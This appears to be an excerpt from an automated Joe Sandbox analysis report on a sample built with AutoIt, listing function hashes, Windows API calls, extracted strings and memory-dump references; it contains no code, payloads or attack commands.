                                                    • Opcode ID: 13f91cfc2676d2bf200b42776b4444a1eb98ec655d40affa7ffddb7421bd853b
                                                    • Instruction ID: 76aeb12ed153b4989cc1f442151d0eecfbbffeae2692f1c5dbc632bb1f259eba
                                                    • Opcode Fuzzy Hash: 13f91cfc2676d2bf200b42776b4444a1eb98ec655d40affa7ffddb7421bd853b
                                                    • Instruction Fuzzy Hash: 55113A7150020CABEB509E64EC84EBB3BAAEB15368F504714FA75972E0C77ADC51AB60
                                                    APIs
                                                    • _memset.LIBCMT ref: 007D31C9
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007D31E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 12b50934023289d86ebbce92e318257f916ed7400c858f2cdb6e80d66b66eb96
                                                    • Instruction ID: 6a0b15f1357843bf38cf8dde542860631c8f57395c30815e2037dc69118cad17
                                                    • Opcode Fuzzy Hash: 12b50934023289d86ebbce92e318257f916ed7400c858f2cdb6e80d66b66eb96
                                                    • Instruction Fuzzy Hash: 1D11E27290051EEBDB20DA98DC45B9D77B8BB45310F140123E955E73A0D77AEF09CB92
                                                    APIs
                                                      • Part of subcall function 007E86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007E849D,?,00000000,?,?), ref: 007E86F7
                                                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0
                                                    • htons.WSOCK32(00000000,?,00000000), ref: 007E84DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 2496851823-2422070025
                                                    • Opcode ID: 2803c663cde6bcd1c9064e7a59a11bda3e44c4838c84d92cc5e80a159df47847
                                                    • Instruction ID: 673872c5b5522a0c44b8caddcbb20178d7f2ba2264ff100891e9cd42dc66d28e
                                                    • Opcode Fuzzy Hash: 2803c663cde6bcd1c9064e7a59a11bda3e44c4838c84d92cc5e80a159df47847
                                                    • Instruction Fuzzy Hash: F911C83510125AABDB20EF64DC46FBEB724FF09320F10851BF915972D1DB76A814CB56
                                                    APIs
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                      • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007C9A2B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 391401af1b13fd5a7760b6cedb47f010f20de55bb19a729ab716fe581f5253fb
                                                    • Instruction ID: d7233d356cae69eec69061a75e5279684a7611997ae6c61d89da29af252bdc5f
                                                    • Opcode Fuzzy Hash: 391401af1b13fd5a7760b6cedb47f010f20de55bb19a729ab716fe581f5253fb
                                                    • Instruction Fuzzy Hash: B901C471941124AB8B14FBA4CC5ADFE736DAF51310B40060DF871532C1EE3958089760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: 68ecda6a0af8871567e61961b4b6e0dd8a2ee251be7f5935e0d5944bdb700dc2
                                                    • Instruction ID: 162bceddeca33d03de999cdfc60086f980364920ac3e7cf77db6ba8ff43da2c7
                                                    • Opcode Fuzzy Hash: 68ecda6a0af8871567e61961b4b6e0dd8a2ee251be7f5935e0d5944bdb700dc2
                                                    • Instruction Fuzzy Hash: AE01F972804268BEDF18C6A8DC5AEFEBBF8DB15301F00419BF552D2281E579E6148760
                                                    APIs
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                      • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 007C9923
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 6e57302d381f97efc8b8450eec4db0664f690fd0eadc0b0488422784e00c3682
                                                    • Instruction ID: 61dddcfd631e865d81cce134ebc4eb6f96aa39c9ce4055007e42606d57294a85
                                                    • Opcode Fuzzy Hash: 6e57302d381f97efc8b8450eec4db0664f690fd0eadc0b0488422784e00c3682
                                                    • Instruction Fuzzy Hash: 4801D471A81104ABCB18FBA0D95AFFFB3ACAF51300F50011DB911A3281DE285E0897B2
                                                    APIs
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                      • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 007C99A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 17d88c6bb1221b2fb53f1e8d0e2ff0781d7aae3804727a97fb2743ab0d2446a7
                                                    • Instruction ID: 6cc0bcb3c0cd981ecb90640f3652279efbca669d0b47d6a0e0b3f360c4b68e61
                                                    • Opcode Fuzzy Hash: 17d88c6bb1221b2fb53f1e8d0e2ff0781d7aae3804727a97fb2743ab0d2446a7
                                                    • Instruction Fuzzy Hash: 9A01A772A81114A7CB14FBB4DA1AFFFB3AD9F51340F50011DBD55A3281DE2D5E089672
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    • API String ID: 2292705959-463685578
                                                    • Opcode ID: 2829d67f0709f0432143c263f0e48a52d88063fc225e2b3796121073edd9461c
                                                    • Instruction ID: 6cd91caf83d1c2decee56f3c6e0d8354eea74dfdf1c7b6275e35adbfbb63af86
                                                    • Opcode Fuzzy Hash: 2829d67f0709f0432143c263f0e48a52d88063fc225e2b3796121073edd9461c
                                                    • Instruction Fuzzy Hash: F9E068336003286BD720AB99BC49FABFBACFB44731F000017FC04D7151EA64AA408BE0
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007C88A0
                                                      • Part of subcall function 00793588: _doexit.LIBCMT ref: 00793592
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: 68a4d904a71303bc6b9121f544bc2e093650b1dacd7bf3fe2f3bce2236206b4e
                                                    • Instruction ID: bf0e9c7d45b5fc796df0573616147fc6f045f454a005cc301de3f57294e7605d
                                                    • Opcode Fuzzy Hash: 68a4d904a71303bc6b9121f544bc2e093650b1dacd7bf3fe2f3bce2236206b4e
                                                    • Instruction Fuzzy Hash: DBD0123138536872D25432A87C1EFCA7A489B15B51F00442ABB18A55C349DE89D042A5
                                                    APIs
                                                      • Part of subcall function 007AB544: _memset.LIBCMT ref: 007AB551
                                                      • Part of subcall function 00790B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007AB520,?,?,?,0077100A), ref: 00790B79
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0077100A), ref: 007AB524
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0077100A), ref: 007AB533
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007AB52E
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 3158253471-631824599
                                                    • Opcode ID: d6bf13a6476fa4977547d5aa5d87bc459034c74705f825cc7003803e4a8c2ccf
                                                    • Instruction ID: 39677c42e90fb0ddc309390bf6c949f67c25f643f4eb54d691cd26ac28823074
                                                    • Opcode Fuzzy Hash: d6bf13a6476fa4977547d5aa5d87bc459034c74705f825cc7003803e4a8c2ccf
                                                    • Instruction Fuzzy Hash: D9E06DB06003118FD760AF29E809B467AE4BF44304F108A2DE456C6741DBB8D548CB91
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 007B0091
                                                      • Part of subcall function 007EC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,007B027A,?), ref: 007EC6E7
                                                      • Part of subcall function 007EC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC6F9
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007B0289
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                    • String ID: WIN_XPe
                                                    • API String ID: 582185067-3257408948
                                                    • Opcode ID: 566b5096925e5a280d1521b75bf0a9136b8baba88354b92426f2a839ec70a27c
                                                    • Instruction ID: 22bf7818ab64315aaf982f16ca374a549dee382bd6f7090ee9dbae7e6b01ae82
                                                    • Opcode Fuzzy Hash: 566b5096925e5a280d1521b75bf0a9136b8baba88354b92426f2a839ec70a27c
                                                    • Instruction Fuzzy Hash: 86F0ED71805109DFCB65EBA5C998BEEBBF8BB48300F644495E146B21A0CB794F84DF61